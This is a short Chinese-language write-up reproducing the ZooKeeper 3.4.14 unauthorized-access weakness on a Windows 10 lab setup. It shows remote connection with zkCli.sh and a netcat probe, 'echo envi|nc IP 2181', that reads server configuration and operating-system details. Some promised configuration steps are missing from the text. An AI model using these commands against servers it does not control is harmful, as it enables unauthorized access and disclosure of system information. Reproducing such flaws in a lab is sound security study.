漏洞原理
個人理解是沒有進行權限控制所致。
復現環境
Microsoft Windows 10 專業版
Zookeeper 3.4.14
Java JDK 1.8.0_181
復現過程
1.環境配置
下載zookeeper:http://archive.apache.org/dist/zookeeper/
下載完成后本地解壓,conf目錄下的zoo_sample.cfg文件重命名名為zoo.cfg,並做如下修改:
找到bin目錄下的zkEnv.cmd並編輯:
2.Zookeeper啟動和連接嘗試
cd到bin目錄,啟動Zookeeper:zkServer.cmd
本機另開一個cmd,嘗試連接:zkCli.cmd -server IP:2181
連接成功,並執行命令:ls /
3.未授權訪問
在kali上嘗試遠程連接,用zkCli.cmd會報錯,換成zkcli.sh
直接連上了。。。。
可執行各種操作:
可查看相關配置和操作系統信息:echo envi|nc IP 2181
本文僅用於技術學習和交流,嚴禁用於非法用途,否則產生的一切后果自行承擔。
如需轉載,請注明出處,這是對他人勞動成果的尊重。